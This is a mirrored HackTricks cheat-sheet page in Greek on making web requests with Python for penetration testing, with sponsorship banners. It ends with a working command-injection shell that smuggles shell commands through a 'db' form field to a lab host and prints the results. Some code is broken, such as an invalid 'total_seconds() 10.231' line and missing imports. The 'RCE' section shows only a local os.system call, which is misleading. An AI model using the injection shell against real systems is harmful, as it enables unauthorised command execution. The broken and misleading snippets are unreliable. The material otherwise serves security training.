mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 14:40:37 +00:00
152 lines
8.3 KiB
Markdown
152 lines
8.3 KiB
Markdown
# Αιτήσεις Ιστού
|
||
|
||
<details>
|
||
|
||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||
|
||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **Εγγραφείτε στην** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||
|
||
</details>
|
||
|
||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
\
|
||
Χρησιμοποιήστε το [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) για να δημιουργήσετε και να **αυτοματοποιήσετε ροές εργασίας** με τα πιο προηγμένα εργαλεία της κοινότητας.\
|
||
Αποκτήστε πρόσβαση σήμερα:
|
||
|
||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||
|
||
## Αιτήσεις Python
|
||
```python
|
||
import requests
|
||
|
||
url = "http://example.com:80/some/path.php"
|
||
params = {"p1":"value1", "p2":"value2"}
|
||
headers = {"User-Agent": "fake User Agent", "Fake header": "True value"}
|
||
cookies = {"PHPSESSID": "1234567890abcdef", "FakeCookie123": "456"}
|
||
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
|
||
|
||
#Regular Get requests sending parameters (params)
|
||
gr = requests.get(url, params=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True)
|
||
|
||
code = gr.status_code
|
||
ret_headers = gr.headers
|
||
body_byte = gr.content
|
||
body_text = gr.text
|
||
ret_cookies = gr.cookies
|
||
is_redirect = gr.is_redirect
|
||
is_permanent_redirect = gr.is_permanent_redirect
|
||
float_seconds = gr.elapsed.total_seconds() 10.231
|
||
|
||
#Regular Post requests sending parameters (data)
|
||
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
|
||
|
||
#Json Post requests sending parameters(json)
|
||
pr = requests.post(url, json=params, headers=headers, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
|
||
|
||
#Post request sending a file(files) and extra values
|
||
filedict = {"<FILE_PARAMETER_NAME>" : ("filename.png", open("filename.png", 'rb').read(), "image/png")}
|
||
pr = requests.post(url, data={"submit": "submit"}, files=filedict)
|
||
|
||
#Useful for presenting results in boolean/time based injections
|
||
print(f"\rflag: {flag}{char}", end="")
|
||
|
||
|
||
|
||
|
||
##### Example Functions
|
||
target = "http://10.10.10.10:8000"
|
||
proxies = {}
|
||
s = requests.Session()
|
||
|
||
def register(username, password):
|
||
resp = s.post(target + "/register", data={"username":username, "password":password, "submit": "Register"}, proxies=proxies, verify=0)
|
||
return resp
|
||
|
||
def login(username, password):
|
||
resp = s.post(target + "/login", data={"username":username, "password":password, "submit": "Login"}, proxies=proxies, verify=0)
|
||
return resp
|
||
|
||
def get_info(name):
|
||
resp = s.post(target + "/projects", data={"name":name, }, proxies=proxies, verify=0)
|
||
guid = re.match('<a href="\/info\/([^"]*)">' + name + '</a>', resp.text)[1]
|
||
return guid
|
||
|
||
def upload(guid, filename, data):
|
||
resp = s.post(target + "/upload/" + guid, data={"submit": "upload"}, files={"file":(filename, data)}, proxies=proxies, verify=0)
|
||
guid = re.match('"' + filename + '": "([^"]*)"', resp.text)[1]
|
||
return guid
|
||
|
||
def json_search(guid, search_string):
|
||
resp = s.post(target + "/api/search/" + guid + "/", json={"search":search_string}, headers={"Content-Type": "application/json"}, proxies=proxies, verify=0)
|
||
return resp.json()
|
||
|
||
def get_random_string(guid, path):
|
||
return ''.join(random.choice(string.ascii_letters) for i in range(10))
|
||
```
|
||
## Εντολή Python για εκμετάλλευση ενός RCE
|
||
|
||
Για να εκμεταλλευτείτε μια ευπάθεια εκτέλεσης ακολουθίας εντολών (RCE) με χρήση της Python, μπορείτε να χρησιμοποιήσετε την ακόλουθη εντολή:
|
||
|
||
```python
|
||
import os
|
||
|
||
os.system('command')
|
||
```
|
||
|
||
Αντικαταστήστε τη λέξη "command" με την εντολή που θέλετε να εκτελέσετε. Η εντολή `os.system()` εκτελεί την εντολή που δίνεται ως παράμετρο στο σύστημα του υπολογιστή.
|
||
|
||
Προσέξτε ότι η εκτέλεση εντολών από την Python μπορεί να είναι επικίνδυνη και πρέπει να χρησιμοποιείται με προσοχή. Βεβαιωθείτε ότι έχετε την απαραίτητη άδεια ή συγκατάθεση για να εκτελέσετε τις εντολές που προορίζεστε να χρησιμοποιήσετε.
|
||
```python
|
||
import requests
|
||
import re
|
||
from cmd import Cmd
|
||
|
||
class Terminal(Cmd):
|
||
prompt = "Inject => "
|
||
|
||
def default(self, args):
|
||
output = RunCmd(args)
|
||
print(output)
|
||
|
||
def RunCmd(cmd):
|
||
data = { 'db': f'lol; echo -n "MYREGEXP"; {cmd}; echo -n "MYREGEXP2"' }
|
||
r = requests.post('http://10.10.10.127/select', data=data)
|
||
page = r.text
|
||
m = re.search('MYREGEXP(.*?)MYREGEXP2', page, re.DOTALL)
|
||
if m:
|
||
return m.group(1)
|
||
else:
|
||
return 1
|
||
|
||
|
||
term = Terminal()
|
||
term.cmdloop()
|
||
```
|
||
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
\
|
||
Χρησιμοποιήστε το [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) για να δημιουργήσετε και να αυτοματοποιήσετε εύκολα ροές εργασίας με τα πιο προηγμένα εργαλεία της κοινότητας.\
|
||
Αποκτήστε πρόσβαση σήμερα:
|
||
|
||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||
|
||
<details>
|
||
|
||
<summary><strong>Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||
|
||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||
|
||
* Εάν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF, ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||
* **Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|